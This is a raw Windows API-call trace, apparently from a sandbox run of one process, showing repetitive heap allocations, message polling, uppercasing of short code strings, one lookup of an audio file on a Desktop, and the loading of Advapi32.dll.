RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0188.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0188.270] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0188.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0188.270] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0188.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0188.270] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0188.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0188.270] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/OPOBoXaM2P4A0m.m4a", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8458b1b0, ftCreationTime.dwHighDateTime=0x1d4cb7e, ftLastAccessTime.dwLowDateTime=0x42db4f80, ftLastAccessTime.dwHighDateTime=0x1d4d2f0, ftLastWriteTime.dwLowDateTime=0x42db4f80, ftLastWriteTime.dwHighDateTime=0x1d4d2f0, nFileSizeHigh=0x0, nFileSizeLow=0x911e, dwReserved0=0x9bf0006, dwReserved1=0xf183, cFileName="OPOBoXaM2P4A0m.m4a", cAlternateFileName="OPOBOX~1.M4A")) returned 0xaa5820 [0188.270] FindClose (in: hFindFile=0xaa5820 | out: hFindFile=0xaa5820) returned 1 [0188.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0188.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0188.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0188.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0188.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.271] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0188.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0188.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0188.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0188.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0188.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0188.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0188.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0188.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0188.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0188.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0188.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0188.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0188.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0188.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0188.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0188.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0188.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0188.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0188.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.272] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0188.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0188.273] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0188.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0188.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9288 [0188.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0188.273] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0188.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0188.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0188.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0188.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0188.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0188.273] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0188.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0188.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0188.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0188.274] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0188.274] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0188.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0188.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0188.274] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0188.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0188.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acc60 [0188.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0188.274] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0188.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0188.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0188.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0188.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0188.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0188.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0188.275] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0188.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0188.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0188.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0188.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0188.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0188.275] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0188.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0188.275] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0188.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0188.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0188.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0188.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0188.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0188.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0188.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0188.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0188.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0188.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0188.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0188.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0188.278] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0188.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0188.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0188.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0188.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0188.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0188.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0188.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0188.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0188.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0188.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0188.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0188.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0188.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0188.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.279] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0188.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0188.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0188.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0188.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0188.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0188.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.280] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0188.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.280] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0188.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0188.280] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0188.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0188.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0188.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c18 [0188.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0188.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab310 [0188.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0188.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0188.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0188.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0188.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0188.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0188.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0188.281] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0188.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0188.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0188.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0188.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0188.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0188.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0188.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0188.281] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0188.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0188.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0188.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0188.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0188.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0188.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0188.282] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0188.282] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0188.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0188.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0188.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0188.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0188.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0188.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0188.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0188.283] 